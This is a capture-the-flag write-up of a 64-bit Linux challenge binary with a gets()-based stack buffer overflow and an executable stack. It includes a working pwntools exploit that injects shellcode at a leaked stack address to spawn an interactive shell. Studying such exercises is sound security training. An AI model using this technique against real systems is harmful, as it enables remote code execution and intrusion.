# [PWNABLE] Simple Pwn :::warning Copyrightⓒ2021 by CSTEC. All contents cannot be copied without permission. ::: ## Analysis It is a simple program that includes all the functionality of the program in main function. ``` ❯ rabin2 -I simple_pwn arch x86 baddr 0x400000 binsz 6613 bintype elf bits 64 canary false class ELF64 compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 crypto false endian little havecode true intrp /lib64/ld-linux-x86-64.so.2 laddr 0x0 lang c linenum true lsyms true machine AMD x86-64 architecture maxopsz 16 minopsz 1 nx false os linux pcalign 0 pic false relocs true relro partial rpath NONE sanitiz false static false stripped false subsys linux va true ``` The NX bit (no-execute) is disabled, allowing data to be executed as code in the stack space. ## Vulnerability ```c .text:0000000000400637 ; Attributes: bp-based frame .text:0000000000400637 ; int __cdecl main(int argc, const char **argv, const char **envp) .text:0000000000400637 public main .text:0000000000400637 main proc near .text:0000000000400637 var_80= byte ptr -80h .text:0000000000400637 ; __unwind { .text:0000000000400637 000 55 push rbp .text:0000000000400638 008 48 89 E5 mov rbp, rsp .text:000000000040063B 008 48 83 C4 80 add rsp, 0FFFFFFFFFFFFFF80h .text:000000000040063F 088 48 8D 55 80 lea rdx, [rbp+var_80] .text:0000000000400643 088 B8 00 00 00 00 mov eax, 0 .text:0000000000400648 088 B9 10 00 00 00 mov ecx, 10h .text:000000000040064D 088 48 89 D7 mov rdi, rdx .text:0000000000400650 088 F3 48 AB rep stosq .text:0000000000400653 088 48 8B 05 F6 09 20 00 mov rax, cs:stdout@@GLIBC_2_2_5 .text:000000000040065A 088 B9 00 00 00 00 mov ecx, 0 ; n .text:000000000040065F 088 BA 02 00 00 00 mov edx, 2 ; modes .text:0000000000400664 088 BE 00 00 00 00 mov esi, 0 ; buf .text:0000000000400669 088 48 89 C7 mov rdi, rax ; stream .text:000000000040066C 088 E8 CF FE FF FF call _setvbuf .text:0000000000400671 088 48 8B 05 E8 09 20 00 mov rax, cs:stdin@@GLIBC_2_2_5 .text:0000000000400678 088 B9 00 00 00 00 mov ecx, 0 ; n .text:000000000040067D 088 BA 02 00 00 00 mov edx, 2 ; modes .text:0000000000400682 088 BE 00 00 00 00 mov esi, 0 ; buf .text:0000000000400687 088 48 89 C7 mov rdi, rax ; stream .text:000000000040068A 088 E8 B1 FE FF FF call _setvbuf .text:000000000040068F 088 48 8D 3D BE 00 00 00 lea rdi, s ; "Welcome." .text:0000000000400696 088 E8 75 FE FF FF call _puts .text:000000000040069B 088 48 8D 45 80 lea rax, [rbp+var_80] .text:000000000040069F 088 48 89 C6 mov rsi, rax .text:00000000004006A2 088 48 8D 3D B4 00 00 00 lea rdi, format ; "This will help you : %p\n" .text:00000000004006A9 088 B8 00 00 00 00 mov eax, 0 .text:00000000004006AE 088 E8 6D FE FF FF call _printf .text:00000000004006B3 088 48 8D 45 80 lea rax, [rbp+var_80] .text:00000000004006B7 088 48 89 C7 mov rdi, rax .text:00000000004006BA 088 B8 00 00 00 00 mov eax, 0 .text:00000000004006BF 088 E8 6C FE FF FF call _gets .text:00000000004006C4 088 B8 00 00 00 00 mov eax, 0 .text:00000000004006C9 088 C9 leave .text:00000000004006CA 000 C3 retn .text:00000000004006CA ; } // starts at 400637 .text:00000000004006CA main endp ``` A stack-based buffer overflow vulnerability exists because the gets function called at address 0x4006BF receives external input without boundary checking. ## Exploit ```python from pwn import * io = remote('0', 9696) data = io.recvlines(2) stack = int(data[1][-14:], 16) shellcode = asm(shellcraft.amd64.sh(), arch='amd64') payload = b'\x90'*(0x80 - len(shellcode) - 0x20) payload += shellcode payload += b'\x90'*0x20 payload += b'b'*8 + p64(stack) io.sendline(payload) io.interactive() ``` Since the size of the buffer to receive data is 0x80, 8 bytes of data after 8 bytes overwriting the SFP becomes the return address after the main function type.